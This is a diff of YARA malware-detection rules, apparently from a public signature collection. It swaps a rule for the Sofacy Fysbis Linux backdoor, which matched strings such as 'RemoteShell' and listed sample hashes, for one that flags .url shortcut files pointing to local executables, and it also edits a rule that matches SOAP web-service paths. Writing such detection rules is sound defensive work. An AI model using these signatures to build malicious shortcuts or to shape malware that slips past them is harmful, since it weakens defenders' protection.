-		$s5 = "ExecStart=" fullword ascii
-		$s6 = "<table><caption><font size=4 color=red>TABLE EXECUTE FILES</font></caption>" fullword ascii
+		$sa1 = "/SimpleAuthWebService/SimpleAuth.asmx"
+		$sa2 = "/ReportingWebService/ReportingWebService.asmx"
+		$sa3 = "/ClientWebService/Client.asmx"
+		$sa4 = "/ReportingWebService/ReportingWebService.asmx"
+		$sb1 = "xsi:type=\"SOAP-ENC:base64\">"
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 500KB and 1 of ( $x* ) ) or ( 1 of ( $x* ) and 3 of ( $s* ) )
+		filesize < 20MB and all of ( $sa* ) and $sb1
 }
-rule SIGNATURE_BASE_Sofacy_Fysbis_ELF_Backdoor_Gen2 : FILE
+rule SIGNATURE_BASE_URL_File_Local_EXE : FILE
 {
 	meta:
-		description = "Detects Sofacy Fysbis Linux Backdoor"
+		description = "Detects an .url file that points to a local executable"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d4e3a8bb-b23a-53a4-b5fb-b321a3417b43"
-		date = "2016-02-13"
+		id = "8b157e98-7b69-5649-b1d8-40bd6b685bf6"
+		date = "2017-10-04"
 		modified = "2023-12-05"
-		reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_fysbis.yar#L37-L55"
+		reference = "https://twitter.com/malwareforme/status/915300883012870144"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_to_local_exe.yar#L1-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1d50a789e9c43fce27f3ad390cbdd9533c61e4f263cec1aa1abfba6545e55c57"
-		score = 80
+		logic_hash = "b85b723142f52ade68f6eb8ba54bb7dffafce0df6d1ae8a7c08b3ce621ccadd4"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592"
-		hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb"
-		hash3 = "fd8b2ea9a2e8a67e4cb3904b49c789d57ed9b1ce5bebfe54fe3d98214d6a0f61"
 
 	strings:
-		$s1 = "RemoteShell" ascii
-		$s2 = "basic_string::_M_replace_dispatch" fullword ascii
-		$s3 = "HttpChannel" ascii
+		$s1 = "[InternetShortcut]" ascii wide fullword
+		$s2 = /URL=file:\/\/\/C:\\[^\n]{1,50}\.exe/
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 500KB and all of them
+		filesize < 400 and all of them
 }